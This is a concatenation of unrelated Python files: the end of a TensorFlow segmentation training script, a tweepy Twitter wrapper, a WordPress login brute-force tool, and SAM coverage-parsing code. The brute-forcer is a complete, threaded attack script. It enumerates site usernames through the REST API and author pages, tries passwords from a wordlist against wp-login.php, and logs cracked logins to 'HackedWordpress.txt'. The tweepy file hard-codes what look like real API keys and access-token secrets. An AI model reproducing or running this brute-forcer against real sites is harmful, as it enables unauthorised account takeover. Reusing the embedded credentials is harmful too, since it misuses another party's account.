    Weights are loaded as constants (not trainable). Returns a dict mapping
    layer names ('input', 'conv1_1' ... 'conv5_2', 'pool1' ... 'pool4') to
    tensors; conv5_3 and later layers are unused and kept disabled.
    """
    if reuse:
        # Reuse the variable scope when the extractor is built a second time.
        tf.get_variable_scope().reuse_variables()
    net={}
    # NOTE(review): 'scipy.io' resolves because 'import scipy.linalg' above
    # binds the top-level 'scipy' name; the module alias used elsewhere is 'sio'.
    vgg_rawnet=scipy.io.loadmat('Models/imagenet-vgg-verydeep-19.mat')
    vgg_layers=vgg_rawnet['layers'][0]
    # VGG preprocessing: subtract the per-channel mean from the input.
    net['input']=input-MEAN_VALUES
    net['conv1_1']=build_net('conv',net['input'],get_weight_bias(vgg_layers,0),name='vgg_conv1_1')
    net['conv1_2']=build_net('conv',net['conv1_1'],get_weight_bias(vgg_layers,2),name='vgg_conv1_2')
    net['pool1']=build_net('pool',net['conv1_2'])
    net['conv2_1']=build_net('conv',net['pool1'],get_weight_bias(vgg_layers,5),name='vgg_conv2_1')
    net['conv2_2']=build_net('conv',net['conv2_1'],get_weight_bias(vgg_layers,7),name='vgg_conv2_2')
    net['pool2']=build_net('pool',net['conv2_2'])
    net['conv3_1']=build_net('conv',net['pool2'],get_weight_bias(vgg_layers,10),name='vgg_conv3_1')
    net['conv3_2']=build_net('conv',net['conv3_1'],get_weight_bias(vgg_layers,12),name='vgg_conv3_2')
    net['conv3_3']=build_net('conv',net['conv3_2'],get_weight_bias(vgg_layers,14),name='vgg_conv3_3')
    net['conv3_4']=build_net('conv',net['conv3_3'],get_weight_bias(vgg_layers,16),name='vgg_conv3_4')
    net['pool3']=build_net('pool',net['conv3_4'])
    net['conv4_1']=build_net('conv',net['pool3'],get_weight_bias(vgg_layers,19),name='vgg_conv4_1')
    net['conv4_2']=build_net('conv',net['conv4_1'],get_weight_bias(vgg_layers,21),name='vgg_conv4_2')
    net['conv4_3']=build_net('conv',net['conv4_2'],get_weight_bias(vgg_layers,23),name='vgg_conv4_3')
    net['conv4_4']=build_net('conv',net['conv4_3'],get_weight_bias(vgg_layers,25),name='vgg_conv4_4')
    net['pool4']=build_net('pool',net['conv4_4'])
    net['conv5_1']=build_net('conv',net['pool4'],get_weight_bias(vgg_layers,28),name='vgg_conv5_1')
    net['conv5_2']=build_net('conv',net['conv5_1'],get_weight_bias(vgg_layers,30),name='vgg_conv5_2')
    # Deeper layers are not needed by build(); kept here for reference.
    #net['conv5_3']=build_net('conv',net['conv5_2'],get_weight_bias(vgg_layers,32),name='vgg_conv5_3')
    #net['conv5_4']=build_net('conv',net['conv5_3'],get_weight_bias(vgg_layers,34),name='vgg_conv5_4')
    #net['pool5']=build_net('pool',net['conv5_4'])
    return net
def build(input,sz):
    """Interactive-segmentation network: multi-scale VGG19 features feeding a
    dilated-convolution tower.

    input: 7-channel batch (RGB in channels 0-2 plus four interaction maps);
    sz: (height, width) to resize VGG feature maps to.
    Returns a 6-channel tanh output in (-1, 1) — six candidate masks that the
    loss definitions below score against the same ground truth.
    """
    # Only the RGB channels are fed to VGG19.
    vgg19_features=build_vgg19(input[:,:,:,0:3])
    for layer_id in range(1,6):
        vgg19_f = vgg19_features['conv%d_2'%layer_id]
        # Upsample each scale's features to image size and stack them on the input.
        input = tf.concat([input, tf.image.resize_bilinear(vgg19_f,sz)], axis=3)
    input = input/255.0
    # Context aggregation: 3x3 convs with exponentially increasing dilation
    # rates (1..128), identity-initialized, with the learnable 'nm' normalizer.
    net=slim.conv2d(input,64,[1,1],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv0')
    net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv1')
    net=slim.conv2d(net,64,[3,3],rate=2,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv2')
    net=slim.conv2d(net,64,[3,3],rate=4,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv3')
    net=slim.conv2d(net,64,[3,3],rate=8,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv4')
    net=slim.conv2d(net,64,[3,3],rate=16,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv5')
    net=slim.conv2d(net,64,[3,3],rate=32,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv6')
    net=slim.conv2d(net,64,[3,3],rate=64,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv7')
    net=slim.conv2d(net,64,[3,3],rate=128,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv8')
    net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv9')
    # Final 1x1 projection to 6 channels, squashed to (-1, 1).
    net=slim.conv2d(net,6,[1,1],rate=1,activation_fn=None,scope='g_conv_last')
    return tf.tanh(net)
def prepare_data():
    """Read training/validation image names (one per line) from ./train.txt
    and ./val.txt.

    Returns (train_im_names, val_im_names) as lists of stripped lines.
    Fix: files are opened with `with` so the handles are closed deterministically
    (the original left them to the garbage collector).
    """
    with open('./train.txt') as f:
        train_im_names = [line.rstrip() for line in f]
    with open('./val.txt') as f:
        val_im_names = [line.rstrip() for line in f]
    return train_im_names, val_im_names
# TF1-style session: let GPU memory grow on demand instead of preallocating.
config=tf.ConfigProto()
config.gpu_options.allow_growth=True
sess=tf.Session(config=config)
# Dataset layout: JPEG images plus SBD instance annotations (.mat files).
im_path = "./img"
seg_path = "./inst"
train_im_names,val_im_names = prepare_data()
# NOTE: 'input' and 'output' shadow Python builtins; kept as-is for compatibility.
# 7 input channels: RGB (3) + pos/neg interaction maps (2) + their binarized
# click masks (2) — see the concatenation in the training loop below.
input=tf.placeholder(tf.float32,shape=[None,None,None,7])
# Single-channel ground-truth mask for one object, scaled to [0, 1].
output=tf.placeholder(tf.float32,shape=[None,None,None,1])
# (height, width) used to resize VGG feature maps back to image resolution.
sz=tf.placeholder(tf.int32,shape=[2])
input_vgg=tf.placeholder(tf.float32,shape=[None,None,None,3])
network=build(input,sz)
# Separate VGG19 graph over a plain RGB placeholder; appears unused below.
vgg19_network=build_vgg19(input_vgg)
# L2 Loss
# Six candidate outputs (channels 0-5) are each compared to the same ground
# truth; reduce_min rewards the best branch while the small weighted sum
# (weights halving 32..1) keeps every branch learning.
loss_d1=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss_d2=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss_d3=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss_d4=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss_d5=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss_d6=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss = tf.reduce_min([loss_d1, loss_d2, loss_d3, loss_d4, loss_d5, loss_d6]) + 0.0025*(32*loss_d1+16*loss_d2+8*loss_d3+4*loss_d4+2*loss_d5+1*loss_d6)
# L1 Loss (evaluated for logging; only all_loss below is optimized)
loss2_d1=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss2_d2=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss2_d3=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss2_d4=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss2_d5=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss2_d6=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss2 = tf.reduce_min([loss2_d1, loss2_d2, loss2_d3, loss2_d4, loss2_d5, loss2_d6]) + 0.0025*(32*loss2_d1+16*loss2_d2+8*loss2_d3+4*loss2_d4+2*loss2_d5+1*loss2_d6)
# IoU Loss (soft IoU: intersection approximated by the product, union by the
# elementwise max; 1e-6 avoids division by zero)
nw1 = tf.expand_dims(network[:,:,:,0],axis=3)
nw2 = tf.expand_dims(network[:,:,:,1],axis=3)
nw3 = tf.expand_dims(network[:,:,:,2],axis=3)
nw4 = tf.expand_dims(network[:,:,:,3],axis=3)
nw5 = tf.expand_dims(network[:,:,:,4],axis=3)
nw6 = tf.expand_dims(network[:,:,:,5],axis=3)
iou_d1 = 1-tf.reduce_mean(tf.multiply(nw1,output))/(tf.reduce_mean(tf.maximum(nw1,output))+1e-6)
iou_d2 = 1-tf.reduce_mean(tf.multiply(nw2,output))/(tf.reduce_mean(tf.maximum(nw2,output))+1e-6)
iou_d3 = 1-tf.reduce_mean(tf.multiply(nw3,output))/(tf.reduce_mean(tf.maximum(nw3,output))+1e-6)
iou_d4 = 1-tf.reduce_mean(tf.multiply(nw4,output))/(tf.reduce_mean(tf.maximum(nw4,output))+1e-6)
iou_d5 = 1-tf.reduce_mean(tf.multiply(nw5,output))/(tf.reduce_mean(tf.maximum(nw5,output))+1e-6)
iou_d6 = 1-tf.reduce_mean(tf.multiply(nw6,output))/(tf.reduce_mean(tf.maximum(nw6,output))+1e-6)
loss_iou = tf.reduce_min([iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6]) + 0.0025*(32*iou_d1+16*iou_d2+8*iou_d3+4*iou_d4+2*iou_d5+1*iou_d6)
# add positive/negative clicks as soft constraints
# NOTE(review): '&' keeps only pixels where BOTH interaction maps (channels
# 3 and 4) are nonzero; the inverted mask then excludes those pixels from
# this term. Confirm '&' (rather than '|') is the intended combination.
ct_mask = tf.cast(input[:,:,:,3],dtype=tf.bool) & tf.cast(input[:,:,:,4],dtype=tf.bool)
ct_mask = tf.tile(tf.expand_dims(~ct_mask,axis=3), [1,1,1,6])
ct_mask = tf.cast(ct_mask, dtype=tf.float32)
# Rescale so the masked L1 term keeps a comparable magnitude.
ct_mask /= tf.reduce_mean(ct_mask)
output_tile = tf.tile(output,[1,1,1,6])
ct_loss = tf.reduce_mean(tf.abs(network - output_tile) * ct_mask)
# Total objective actually minimized by the optimizer.
all_loss = loss_iou + ct_loss
# Train only this model's variables (those created under 'g_*' scopes);
# the VGG19 weights are tf.constants and not trainable anyway.
opt=tf.train.AdamOptimizer(learning_rate=0.0001).minimize(all_loss,var_list=[var for var in tf.trainable_variables() if var.name.startswith('g_')])
saver=tf.train.Saver(max_to_keep=1000)
# Deprecated TF1 API; tf.global_variables_initializer() is its replacement.
sess.run(tf.initialize_all_variables())
# Resume from the latest checkpoint when one exists.
ckpt=tf.train.get_checkpoint_state("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh")
if ckpt:
    print('loaded '+ckpt.model_checkpoint_path)
    saver.restore(sess,ckpt.model_checkpoint_path)
# Lazy in-memory caches of training images and their instance masks.
input_images=[None]*len(train_im_names)
output_masks=[None]*len(train_im_names)
# For displaying the losses
# NOTE: 'all' shadows the builtin; these hold per-step losses of one epoch.
all=np.zeros(30000,dtype=float)
all2=np.zeros(30000,dtype=float)
all_iou=np.zeros(30000,dtype=float)
all_d1=np.zeros(30000,dtype=float)
all_d2=np.zeros(30000,dtype=float)
all_d3=np.zeros(30000,dtype=float)
all_d4=np.zeros(30000,dtype=float)
all_d5=np.zeros(30000,dtype=float)
all_d6=np.zeros(30000,dtype=float)
for epoch in range(1,101):
    # Resume support: skip epochs whose result folder already exists.
    if os.path.isdir("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch):
        continue
    cnt=0
    # One pass over the training images in random order.
    for id in np.random.permutation(len(train_im_names)):
    # for id in np.random.permutation(1):
        if input_images[id] is None:
            # The input image (cached in memory after the first read)
            input_images[id] = cv2.imread(im_path + "/" + train_im_names[id]+".jpg",-1)
        if output_masks[id] is None:
            # The SBD Groundtruth mask (instance segmentation from the .mat file)
            mat_contents = sio.loadmat(seg_path + "/" + train_im_names[id] + ".mat")
            tmpstr = mat_contents['GTinst']
            tmpmat = tmpstr[0,0]
            output_masks[id] = tmpmat['Segmentation']
        # 255 marks 'void' pixels in SBD; drop them before counting objects.
        output_mask = deepcopy(output_masks[id])
        output_mask[output_mask==255] = 0
        num_obj = output_mask.max()
        # Train once per object instance in the image.
        for obj_id in range(num_obj):
            st = time.time()
            # random clicks: pick one of 15 pre-generated interaction maps.
            input_pos = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_pos.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
            input_neg = cv2.imread("./train" + "/" + train_im_names[id] + "/ints/%03d_%03d_neg.png" % (obj_id + 1, np.random.randint(1, 16)),-1)
            # Binarized click masks derived from the interaction maps.
            input_pos_clks = deepcopy(input_pos)
            input_neg_clks = deepcopy(input_neg)
            input_pos_clks[input_pos != 0] = 255
            input_neg_clks[input_neg != 0] = 255
            # NOTE(review): skips samples whose positive map has no zero
            # pixels at all — confirm this guard's intent.
            if np.sum(input_pos==0)==0:
                continue
            # Stack image + 4 interaction channels into the 7-channel input.
            input_image=np.expand_dims(np.float32(np.concatenate(
                [input_images[id], np.expand_dims(input_pos,axis=2), np.expand_dims(input_neg,axis=2),
                 np.expand_dims(input_pos_clks,axis=2), np.expand_dims(input_neg_clks,axis=2)], axis=2)),axis=0)
            _,iH,iW,_=input_image.shape
            # Binary target for this single object (255 inside, 0 outside),
            # then scaled to [0, 1].
            output_image = deepcopy(output_mask)
            output_image[output_mask != (obj_id+1)] = 0
            output_image[output_mask == (obj_id+1)] = 255
            output_image=np.expand_dims(np.expand_dims(np.float32(output_image),axis=0),axis=3)/255.0
            # One optimization step; also fetch branch losses for logging.
            _,current,current2,current3,d1,d2,d3,d4,d5,d6=sess.run([opt,loss,loss2,loss_iou, iou_d1, iou_d2, iou_d3, iou_d4, iou_d5, iou_d6],feed_dict={input:input_image,sz:[iH,iW],output:output_image})
            all[cnt]=current*255.0*255.0 #squared in 255 range (remember the network takes [0,1]
            all2[cnt]=current2*255.0 #changed to 255 in error
            all_iou[cnt]=current3
            all_d1[cnt]=d1
            all_d2[cnt]=d2
            all_d3[cnt]=d3
            all_d4[cnt]=d4
            all_d5[cnt]=d5
            all_d6[cnt]=d6
            cnt+=1
            # Running means over the nonzero entries recorded so far.
            print("%d %d l2: %.4f l1: %.4f IoU: %.4f d1-6: %.4f %.4f %.4f %.4f %.4f %.4f time: %.4f %s"%(epoch,cnt,np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)]),np.mean(all_d1[np.where(all_d1)]),
                  np.mean(all_d2[np.where(all_d2)]),np.mean(all_d3[np.where(all_d3)]),np.mean(all_d4[np.where(all_d4)]), np.mean(all_d5[np.where(all_d5)]), np.mean(all_d6[np.where(all_d6)]),
                  time.time()-st,os.getcwd().split('/')[-2]))
    # End-of-epoch bookkeeping: write scores and save checkpoints.
    os.makedirs("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d"%epoch)
    target=open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/score.txt"%epoch,'w')
    target.write("%f\n%f\n%f"%(np.mean(all[np.where(all)]),np.mean(all2[np.where(all2)]),np.mean(all_iou[np.where(all_iou)])))
    target.close()
    saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/model.ckpt")
    saver.save(sess,"result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/model.ckpt"%epoch)
    # validation: first 100 val images, first object with the first click pair.
    all_test = np.zeros(100, dtype=float)
    all2_test = np.zeros(100, dtype=float)
    all_iou_test = np.zeros(100, dtype=float)
    target = open("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/test_score.txt" % epoch, 'w')
    for id in range(100):
        input_image = cv2.imread(im_path + "/" + val_im_names[id] + ".jpg", -1)
        input_pos = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_pos.png" % (1, 1), -1)
        input_neg = cv2.imread("./val" + "/" + val_im_names[id] + "/ints/%03d_%03d_neg.png" % (1, 1), -1)
        input_pos_clks = deepcopy(input_pos)
        input_neg_clks = deepcopy(input_neg)
        input_pos_clks[input_pos != 0] = 255
        input_neg_clks[input_neg != 0] = 255
        output_gt = cv2.imread("./val" + "/" + val_im_names[id] + "/objs/%05d.png" % 1, -1)
        output_gt = np.expand_dims(np.expand_dims(np.float32(output_gt), axis=0), axis=3) / 255.0
        iH, iW, _ = input_image.shape
        input_image = np.expand_dims(np.float32(np.concatenate(
            [input_image, np.expand_dims(input_pos, axis=2), np.expand_dims(input_neg, axis=2),
             np.expand_dims(input_pos_clks, axis=2), np.expand_dims(input_neg_clks, axis=2)], axis=2)), axis=0)
        st=time.time()
        # Forward pass only (no optimizer in the fetch list).
        output_image, loss_test, loss2_test, iou_test = sess.run([network, loss, loss2, loss_iou],feed_dict={input:input_image,sz:[iH,iW],output: output_gt})
        all_test[id] = loss_test * 255.0 * 255.0
        all2_test[id] = loss2_test * 255
        all_iou_test[id] = iou_test
        target.write("%f %f %f\n" % (all_test[id], all2_test[id], all_iou_test[id]))
        print("%.3f"%(time.time()-st))
        # Clamp predictions to [0, 1] before visualization.
        output_image = np.minimum(np.maximum(output_image, 0.0), 1.0)
        # Save each of the six predicted masks and an overlay visualization.
        for output_d in range(6):
            save_image = input_image[0, :, :, 0:3] / 255.0
            save_image[:, :, 0] = (save_image[:, :, 0] + 0.5 * output_image[0, :, :, output_d])
            save_image[:, :, 1] = (save_image[:, :, 1] + 0.5 * output_image[0, :, :, output_d])
            save_image[:, :, 2] = (save_image[:, :, 2] + 0.5 * output_image[0, :, :, output_d])
            save_image = np.minimum(np.maximum(save_image, 0.0), 1.0) * 255.0
            cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d_BW.png" % (epoch, val_im_names[id], output_d),
                        np.uint8(output_image[0, :, :, output_d] * 255.0))
            cv2.imwrite("result64_vgg19_RDL6_IoU_dt_pt_ct_tanh/%04d/%s_%02d.jpg" % (epoch, val_im_names[id], output_d),
                        np.uint8(save_image))
    target.write("Mean: %f %f %f\n" % (np.mean(all_test[np.where(all_test)]), np.mean(all2_test[np.where(all2_test)]), np.mean(all_iou_test[np.where(all_iou_test)])))
    target.close()
|
nilq/baby-python
|
python
|
import tweepy
from tweepy.parsers import JSONParser
# This class creates an instance of the Twitter API
class API(object):
    """Thin wrapper around the tweepy client: user lookup, full-timeline
    paging and rate-limit inspection."""

    # Initiates the API
    def __init__(self):
        # SECURITY: hard-coded credentials ship with the source; move them to
        # environment variables or a config file and rotate these keys.
        self.consumer_key = 'EfbgNEMgmXNSweNDcWmoaSwm0'
        self.consumer_secret = 'u3HlNeQNhG4whVzbilCxvswfJTMLG4ppxisaqtB4exHvGgDxsc'
        self.access_token_key = '3940337423-CC2NFNG4zX9t3Z4Hl5vAbseYmlhlz6CXbuDlQNr'
        self.access_token_secret = 'tmK2f3ZPrOWSkqY2bzu9St0LqDzJVIp5IV8PWPwENh69z'
        self.auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
        self.auth.set_access_token(self.access_token_key, self.access_token_secret)
        self.api = tweepy.API(self.auth, parser = JSONParser())

    # From a list of user_names, it returns the corresponding User entities
    def get_users(self, user_names):
        """Return the User entity for each screen name in user_names."""
        return [self.api.get_user(name) for name in user_names]

    # Returns all the tweets in the timeline of a particular user
    def read_tweets(self, user_id):
        """Return the user's full timeline, paging backwards 200 tweets at a time.

        Fix: tweets are now accumulated across pages; previously the buffer
        was reset on every loop iteration, so only the last page was returned.

        :raises tweepy.error.RateLimitError: with a progress message when the
            API rate limit is hit part-way through.
        """
        tweets = []        # accumulated across all pages
        newest_id = 1      # id of the newest tweet read (always greater than the oldest)
        oldest_id = 0      # id of the oldest tweet read; 0 means nothing read yet
        # While we are receiving new tweets
        while newest_id - oldest_id > 0:
            try:
                if oldest_id == 0:
                    # First request: the newest 200 tweets of the timeline.
                    batch = self.api.user_timeline(id = user_id, count = 200)
                else:
                    # Page backwards: tweets at or before the oldest one seen.
                    # NOTE: max_id is inclusive, so the boundary tweet repeats.
                    batch = self.api.user_timeline(id = user_id, count = 200,
                                                   max_id = oldest_id)
                if not batch:
                    # Guard: an empty page would otherwise raise IndexError below.
                    break
                tweets.extend(batch)
                newest_id = batch[0]['id']
                oldest_id = batch[-1]['id']
            except tweepy.error.RateLimitError:
                limit = len(tweets)
                msg = "Rate limit reached after reading %d tweets." % (limit)
                raise tweepy.error.RateLimitError(msg)
        return tweets

    def rate_limit_status(self):
        """Return the remaining-call limit for the account settings endpoint."""
        return self.api.rate_limit_status()['resources']['account']['/account/settings']['limit']
|
nilq/baby-python
|
python
|
# coding=utf-8
import threading, time, re, os, sys, json, random
try:
import requests
except ImportError:
print '---------------------------------------------------'
print '[*] pip install requests'
print ' [-] you need to install requests Module'
sys.exit()
'''
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/
|_|
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
'''
class mulai(object):
def __init__(self):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.cls()
self.print_logo()
site = raw_input(self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' Target: ' + self.c)
if site.startswith('http://'):
site = site.replace('http://', '')
elif site.startswith('https://'):
site = site.replace('https://', '')
else:
pass
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.w + ' START BruteForce Process: ' \
+ self.c + site
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
source = requests.get('http://' + site + '/wp-login.php', timeout=5, headers=agent).text.encode('utf-8')
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get Wp-login.php SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [ URL Not valid or Timeout! or Your Ip Address Blocked! ]'
sys.exit()
try:
WpSubmitValue = re.findall('class="button button-primary button-large" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.w + \
' [Trying to Get WpSubmit Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
try:
WpRedirctTo = re.findall('name="redirect_to" value="(.*)"', source)[0]
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.g + ' [OK]'
time.sleep(0.5)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Trying to Get WpRedirctTo Value From SourceCode] ' + self.r + ' [NO]'
sys.exit()
if 'Log In' in WpSubmitValue:
WpSubmitValue = 'Log+In'
else:
WpSubmitValue = WpSubmitValue
usgen = self.UserName_Enumeration(site)
if usgen != None:
Username = usgen
time.sleep(1)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Enumeration Username: ' + self.g + str(Username) + self.g + ' [OK]'
else:
try:
Username = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w +
' Username for Start bf: ')
if Username == '':
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Username] ' + self.r + ' [NO]'
sys.exit()
try:
password = raw_input(self.c + ' [' + self.y + '*' + self.c + ']' + self.w + ' input Password list: ')
with open(password, 'r') as xx:
passfile = xx.read().splitlines()
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.g + \
str(len(passfile)) + self.c + ' Passwords Loaded!'
time.sleep(2)
except:
print self.c + ' [' + self.y + '-' + self.c + ']' + self.w + \
' [Password list] ' + self.r + ' [NO]'
sys.exit()
thread = []
for passwd in passfile:
t = threading.Thread(target=self.BruteForce, args=(site, passwd, WpSubmitValue, WpRedirctTo, Username))
if self.flag == 1:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'wordpress' + self.c + ' [Not Vuln]'
def cls(self):
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def print_logo(self):
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
os.system("figlet wp-brute | lolcat")
x = """
r00t@star
Sunda Cyber Army github.com/bintangAlif5
Note! : We don't Accept any responsibility for any illegal usage.
example : http://site
"""
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
def UserName_Enumeration(self, site):
_cun = 1
Flag = True
__Check2 = requests.get('http://' + site + '/?author=1', timeout=10)
try:
while Flag:
GG = requests.get('http://' + site + '/wp-json/wp/v2/users/' + str(_cun), timeout=5)
__InFo = json.loads(GG.text)
if 'id' not in __InFo:
Flag = False
else:
Usernamez = __InFo['slug']
return str(Usernamez).encode('utf-8')
break
except:
try:
if '/author/' not in __Check2.text:
return None
else:
find = re.findall('/author/(.*)/"', __Check2.text)
username = find[0]
if '/feed' in username:
find = re.findall('/author/(.*)/feed/"', __Check2.text)
username2 = find[0]
return username2.encode('utf-8')
else:
return username.encode('utf-8')
except requests.exceptions.ReadTimeout:
return None
def BruteForce(self, site, passwd, WpSubmitValue, WpRedirctTo, Username):
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['log'] = Username
post['pwd'] = passwd
post['wp-submit'] = WpSubmitValue
post['redirect_to'] = WpRedirctTo
post['testcookie'] = 1
url = "http://" + site + '/wp-login.php'
GoT = requests.post(url, data=post, headers=agent, timeout=10)
print self.c + ' [' + self.y + '+' + self.c + ']' + self.w + \
' Testing: ' + self.y + passwd
if 'wordpress_logged_in_' in str(GoT.cookies):
print self.c + ' [' + self.y + '+' + self.c + '] ' + \
self.y + site + ' ' + self.y + 'username: ' + self.g \
+ Username + self.y + ' Password: ' + self.g + passwd
with open('HackedWordpress.txt', 'a') as writer:
writer.write('http://' + site + '/wp-login.php' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
mulai()
|
nilq/baby-python
|
python
|
"""
methods for processing mapping results in SAM/BAM format
def parse_deltas(sam_file, ...):
parse a sam/bam file into dicts of coverage changes by position
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
convert coverage deltas into coverage array
class SAMFlag(IntFlag):
class for decomposing SAM flags into bits for easier understanding
"""
import numpy
import subprocess
import enum
from collections import defaultdict
from edl import blastm8
import logging
SAMTOOLS_CMD_TEMPLATE = """samtools view -F 2308 {sam_file}"""
def parse_deltas_from_sam(sam_file, samtools_cmd_template=SAMTOOLS_CMD_TEMPLATE, **kwargs):
    """
    Parse a SAM file into per-reference-sequence coverage deltas.

    The file is piped through samtools (which, by default, strips all but
    the primary alignments); the resulting lines are handed to
    parse_deltas(), and kwargs are forwarded to blastm8.FilterParams().
    """
    command = samtools_cmd_template.format(sam_file=sam_file)
    with subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,) as proc:
        decoded_lines = (raw.decode() for raw in iter(proc.stdout))
        return parse_deltas(decoded_lines, format=blastm8.SAM, **kwargs)
def parse_deltas(hit_table, portion=False, zero_indexed=False, **kwargs):
    """ parses hit table into coverage deltas.

    Returns {reference: {position: coverage_change}}; kwargs are passed to
    blastm8.generate_hits()."""
    # dict of dicts of counts, keyed by reference then by position
    coverage_deltas = defaultdict(lambda: defaultdict(int))
    n_reads = n_hits = 0
    for read, hits in blastm8.generate_hits(hit_table, **kwargs):
        n_reads += 1
        # Optionally split one read's weight evenly across its hits.
        weight = 1 / len(hits) if portion else 1
        for hit in hits:
            n_hits += 1
            left, right = sorted((hit.hstart, hit.hend))
            if zero_indexed:
                # Shift to 1-based coordinates.
                left, right = left + 1, right + 1
            coverage_deltas[hit.hit][left] += weight
            coverage_deltas[hit.hit][right + 1] -= weight
    logging.debug(
        "parsed deltas for %d contigs from %d reads and %d hits",
        len(coverage_deltas),
        n_reads,
        n_hits,
    )
    return coverage_deltas
def deltas_to_cov(cov_deltas, x_max=None, nan_for_zero=True):
    """ converts dict of coverage deltas into array of coverage values

    cov_deltas: {pos: cov_change, ...} with 1-based positions
    x_max: length of reference sequence (otherwise use last delta position)
    nan_for_zero: replace 0 coverage with NaN so plots are discontinuous
    """
    # Fix: numpy.nan — the numpy.NAN alias was removed in NumPy 2.0.
    zero = numpy.nan if nan_for_zero else 0
    sorted_keys = sorted(cov_deltas)
    cov_segments = []
    last_pos = 1
    current_coverage = 0
    for pos in sorted_keys:
        # Emit the constant-coverage run that ends just before this delta.
        cov_segments.append(
            numpy.full(
                pos - last_pos, current_coverage if current_coverage != 0 else zero
            )
        )
        current_coverage += cov_deltas[pos]
        last_pos = pos
